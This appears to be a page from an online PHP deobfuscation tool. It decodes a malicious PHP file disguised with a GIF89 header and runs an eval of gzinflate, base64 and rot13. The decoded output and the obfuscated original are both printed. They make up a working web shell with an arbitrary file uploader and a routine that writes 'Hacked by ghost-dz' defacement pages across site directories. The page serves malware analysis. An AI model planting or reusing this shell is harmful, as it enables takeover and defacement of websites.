Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

GIF89GHZ <?php eval (gzinflate(base64_decode(str_rot13("eIAgn9fjRC68DC7QIDhGN43qSDcwvp3Tn..

Decoded Output download

if ( isset($_GET['up']) )
{
echo '<b>by ghost-dz<br><br>'.php_uname().'<br></b>';
echo '<b>'.getcwd().'</b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload ok :d !!!</b><br><br>'; }
	else { echo '<b>Upload Fail !!!</b><br><br>'; }
}
exit;
}

if ( isset($_GET['ghz']) )
{
chdir('..'); chdir('..'); $path = getcwd();
$xxx = 
'<html>
<head>
<meta http-equiv="Content-Language" content="fr">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Hacked by ghost-dz</title>
</head>
<body bgcolor="#000000">
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center"><font size="8" color="#FFFFFF">Hacked by ghost-dz</font></p>
<p align="center"><font size="8" color="#FF0000">Algerian Hacker</font></p>
</body>
</html>'; 
$fff = fopen($path.'/gh.html', 'w'); fwrite($fff, $xxx); fclose($fff);
$fff = fopen($path.'/tmp/gh.html', 'w'); fwrite($fff, $xxx); fclose($fff);
$fff = fopen($path.'/logs/gh.html', 'w'); fwrite($fff, $xxx); fclose($fff);
$fff = fopen($path.'/images/gh.html', 'w'); fwrite($fff, $xxx); fclose($fff);
$fff = fopen($path.'/cache/gh.html', 'w'); fwrite($fff, $xxx); fclose($fff);
exit;
}

Did this file decode correctly?

Original Code

GIF89GHZ
<?php eval (gzinflate(base64_decode(str_rot13("eIAgn9fjRC68DC7QIDhGN43qSDcwvp3TnYMOLLA2a0bVfv3obeXy2KYmZiosq5XFYg3PLXKTkgX9CUr655RbVNQEqqjRb+KUl5go2zh6TZA4BCtkUCPfHxOanMWhbXkHMlo5qcn2vs1bdPh97OgJ82NpHzrB0bEBQ9WbJ
UXGeKVK8AuMdYLTyuzuzctDdYzcIO4GwHHV8PLmT81wHisFPZ1nR9a4Fp4ZV2OYkdGKHeTpgjERseN7ePRn3EijFVJDsW/d153L4ievwPF7DB9pVuGMWKI9JtiwX3w7CMZ9Be65pcwc+aV1EEUNnCa1lmKB0ZoFOpDk7PAuQQwCSkw0YyA6t8Brs766iY6ygur6hXJz1xioNS2pjy9B7
ktwOwmZ1tBQhbB3BMlpaAw5CaNmuM9LwphBU0zMZlTCM+QY18WZ3pbr6H9kyAK2gmdlXuqgDZBDwdsjnQCFmSDDj559OOlg12h0QNq0IcynWfCOeBVfg3/xaxSywW7j7724w8xU1EwrzZxIn8drypuI5v1VUGY8e5Do5B0t3CP1vJj92lOe8FGkFwF5JaJG1+pK5j7YPPA58byyqmlUD
6SU3bZu0o7IIBHoFZgZFqKT5BJMrklXOvMSvIeBfYQI4nfz7sE0ShxarCS2ATLa0Qs2BY7p3Q3xnX82V/yiCA/+r1alIeNTUUQ7TPllM/MQfYluHWQZbvvDmRWc3tFB7WOTMEKnPUbXqTISHXknLKutL1UFFY+1MIW13hMRpDjUo8XmLHyIqf8TWzeH4iCOMFle+SCD9ys0Sj==")))); ?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 ee0f27359e2eb18ea553f98ded87461d
Eval Count 1
Decode Time 91 ms